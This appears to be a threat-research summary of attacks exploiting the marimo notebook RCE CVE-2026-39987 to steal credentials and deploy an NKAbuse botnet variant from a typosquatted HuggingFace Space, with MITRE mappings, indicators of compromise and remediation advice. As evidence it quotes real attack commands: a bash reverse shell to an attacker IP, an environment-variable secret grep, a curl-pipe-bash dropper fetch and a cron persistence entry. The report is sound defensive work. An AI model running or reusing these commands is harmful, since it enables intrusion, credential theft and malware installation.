Threat Research

CVE-2026-39987 update: How attackers weaponized marimo to deploy a blockchain botnet via HuggingFace

Sysdig
CVE-2026-39987 update: How attackers weaponized marimo to deploy a blockchain botnet via HuggingFace
Three days after disclosure of a pre-auth remote code execution in the marimo Python notebook platform (GHSA-2679-6mx9-h9xc / CVE-2026-39987), multiple actors exploited the flaw to harvest credentials, run reverse shells, pivot to PostgreSQL/Redis, and deploy a previously undocumented NKAbuse variant hosted on a typosquatted HuggingFace Space. Defenders should look for the VS Code typosquat vsccode-modetx.hf.space, the kagent implant and installer, rotated credentials, and runtime behaviors such as reverse shells and systemd/crontab persistence #NKAbuse #marimo

Keypoints

  • GHSA-2679-6mx9-h9xc (CVE-2026-39987) was weaponized within hours and by day three produced 662 exploit events from 11–12 unique source IPs across multiple countries.
  • Attackers frequently harvested environment variables and configuration files (.env, docker-compose.yml, SSH keys) to collect cloud credentials, DATABASE_URL values, and API tokens for lateral access.
  • Operators attempted numerous reverse-shell techniques (bash, sh, Python, netcat, UDP/TCP variants) and, when direct callbacks failed, pivoted to PostgreSQL and Redis using harvested credentials.
  • A typosquatted HuggingFace Space (vsccode-modetx.hf.space) hosted a dropper (install-linux.sh) that installed a UPX-packed Go binary named kagent — a previously undocumented NKAbuse variant using the NKN blockchain for C2.
  • Persistence mechanisms observed included systemd user services, crontab @reboot entries, and macOS LaunchAgents; runtime detection rules triggered on reverse shells, inline curl|bash, and persistence actions.
  • Recommendations: update marimo to 0.23.0+, hunt for ~/.kagent and kagent.service, block the typosquat at proxy/DNS, rotate exposed credentials, monitor for NKN C2 patterns, and deploy behavioral runtime detection.

MITRE Techniques

  • [T1190 ] Exploit Public-Facing Application – marimo pre-auth RCE was used as initial access. Quote: (‘pre-authorization remote code execution (RCE) in the marimo Python notebook platform’)
  • [T1059 ] Command and Scripting Interpreter – attackers used shell and scripting interpreters for reverse shells and execution. Quote: (‘bash -i >& /dev/tcp/159.100.6.251/4444 0>&1’)
  • [T1552.001 ] Credentials in Files – adversaries read environment variables and config files to harvest keys and DB URLs. Quote: (‘env | grep -iE ‘key|secret|token|api|pass|db|mongo|pg|mysql|openai|anthropic”)
  • [T1078 ] Valid Accounts – stolen credentials were used to access and enumerate PostgreSQL and Redis instances. Quote: (‘psql -h HOST.internal -U marimo -d marimo’ and ‘AUTH ‘)
  • [T1071.004 ] Application Layer Protocol: DNS – DNS-based out-of-band confirmation was used for RCE verification. Quote: (‘ping bskke4.dnslog.cn’)
  • [T1105 ] Ingress Tool Transfer – payloads and droppers were retrieved from a remote HuggingFace Space using curl/wget. Quote: (‘curl -fsSL https://vsccode-modetx.hf.space/install-linux.sh | bash’)
  • [T1543.003 ] Create or Modify System Process: Systemd service – the dropper attempted persistence via a systemd user service. Quote: (‘systemd user service (~/.config/systemd/user/kagent.service)’)
  • [T1053 ] Scheduled Task/Job – persistence via cron @reboot entries was installed by the dropper. Quote: (‘@reboot cd $HOME/.kagent && $HOME/.kagent/kagent >/dev/null 2>&1’)
  • [T1036.005 ] Masquerading: Match Legitimate Name or Location – the attacker used typosquatting and a binary name that mimicked a legitimate Kubernetes AI agent. Quote: (‘typosquat of “VS Code”‘ and ‘kagent, also the name of a legitimate Kubernetes AI agent tool’)
  • [T1027 ] Obfuscated Files or Information – the kagent payload was UPX-packed to hinder static detection. Quote: (‘packed with UPX (4.3 MB → 15.5 MB)’)

Indicators of Compromise

  • [Domain/URL ] payload host and DNS oracle – https://vsccode-modetx.hf.space/, bskke4.dnslog.cn
  • [Dropper URL ] installer script – https://vsccode-modetx.hf.space/install-linux.sh
  • [File hash ] malware and installer – SHA256 27c62a041cc3c88df60dfceb50aa5f2217e1ac2ef9e796d7369e9e1be52ebb64 (kagent packed), 25e4b2c4bb37f125b693a9c57b0e743eab2a3d98234f7519cd389e788252fd13 (install-linux.sh), and 1 more hash
  • [File name ] payload and installer – kagent, install-linux.sh
  • [Host file path ] persistence and artifacts – $HOME/.kagent/kagent, $HOME/.config/systemd/user/kagent.service
  • [Process name ] running implant – kagent (process name and PID at $HOME/.kagent/kagent.pid)
  • [IP address ] notable exploiters/sources – 159.100.6.251 (Germany) — reverse shells and PostgreSQL lateral movement, 38.147.173.172 (Hong Kong) — NKAbuse deployer via HuggingFace Space, and 10 more IPs

Read more: https://www.sysdig.com/blog/cve-2026-39987-update-how-attackers-weaponized-marimo-to-deploy-a-blockchain-botnet-via-huggingface